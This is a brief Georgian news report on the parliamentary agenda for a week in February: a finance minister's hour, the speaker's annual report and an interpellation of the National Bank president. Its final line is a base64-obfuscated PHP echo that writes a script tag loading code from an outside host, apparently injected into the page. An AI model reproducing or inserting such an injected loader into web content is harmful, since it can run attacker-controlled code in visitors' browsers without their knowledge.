celsiusi
ავერსი საქკაბელი

მიმდინარე კვირაში საქართველოს პარლამენტში ფინანსთა მინისტრის საათი, ეროვნული ბანკის პრეზიდენტის ინტერპელაცია და პარლამენტის თავმჯდომარის ანგარიშის მოსმენა გაიმართება, – ამის შესახებ ბიუროს სხდომაზე გახდა ცნობილი.

შალვა პაპუაშვილის განცხადებით, 20 თებერვალს პლენარული სხდომა პოლიტიკური განცხადებებით დაიწყება, შემდეგ კი კანონპროექტებს განიხილავენ და კენჭს უყრიან.

პაპუაშვილის თქმით, 21 თებერვალს ირაკლი კობახიძის ადგილმონაცვლის უფლებამოსილების ცნობის საკითხს ეყრება კენჭი, შემდეგ კი მინისტრის საათის ფორმატში ფინანსთა მინისტრს მოუსმენენ.

22 თებერვალს ყოველწლიურ ანგარიშს დეპუტატებს შალვა პაპუაშვილი წარუდგენს, 23 თებერვალს კი ეროვნული ბანკის პრეზიდენტის ინტერპელაცია გაიმართება.

246
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");